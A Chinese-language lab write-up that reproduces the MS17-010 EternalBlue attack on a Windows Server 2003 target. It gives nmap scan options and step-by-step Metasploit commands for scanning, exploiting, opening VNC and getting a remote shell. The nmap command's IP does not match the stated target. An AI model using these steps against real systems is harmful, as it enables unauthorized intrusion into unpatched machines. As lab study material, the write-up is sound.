ms17-010(永恒之蓝)漏洞复现
1. 复现环境
-
攻击机:kali-Linux,ip:192.168.242.128
-
靶机:Windows Server 2003, ip: 192.168.242.130
-
工具:nmap、msf
2. 复现过程
2.1 nmap扫描靶机开放端口
nmap -T4 -A -v 192.168.242.134
-sS/sT/sA/sW/sM:TCP扫描
- S是SYN扫描,半连接扫描,nmap只发送SYN报文,通过服务器是否响应SYN+ACK来判断对应端口是否开放
- T是全连接扫描会和服务器建立完整的三次握手,效率低(上面的4代表时序,越高扫描越快)
- A发送ACK报文,通过服务器响应来判断是否开放,有的服务器不开会回复ICMP端口不可达,当回复RST时表示可能被拦截或者端口开放,不是一个准确的判断条件
- W 是窗口扫描,发出的报文和ACK一样,利用的是在某些系统中如果端口开放,收到ACK包后会响应一个窗口非0的RST包
- M是Maimon扫描,使用发现者的名字命名。其原理是向目标服务器发送FIN/ACK 报文,在某些系统中如果端口开放则会丢弃该报文不做响应,如果端口关闭则回复RST或者ICMP,Nmap可借此判断服务器端口的开放情况。
-v:增加详细级别
-Pn:无ping扫描
-PS 指 TCP SYN Ping,
-PA 指 TCP ACK Ping,
-PU 指 UDP Ping

可以看到开放了445端口。
2.2 进入MSF框架找相应的扫描模块
msfconsole
search ms17-010

其中0是攻击模块,3是扫描模块
2.3 对靶机进行永恒之蓝扫描
use auxiliary/scanner/smb/smb_ms17_010
show options //查看要设置的参数

Required栏中选项为yes的说明对应的Current Setting栏需要填写。
设置参数:
set rhosts 192.168.242.130 //设置要攻击的ip(或ip段)
设置完后可以再次使用show options检查。
完成后输入run执行扫描。

扫描完成,结果显示大概率可以利用永恒之蓝进行攻击。
2.4 调用攻击模块
use exploit/windows/smb/ms17_010_eternalblue(用于64位机)
这里由于该系统是32位的,所以用编号为1的攻击模块
然后同2.3中设置要攻击的ip,run进行攻击。

执行远程桌面:
run vnc

执行成功
ps查看靶机进程:

shell 进行反弹shell:

复现完毕。

浙公网安备 33010602011771号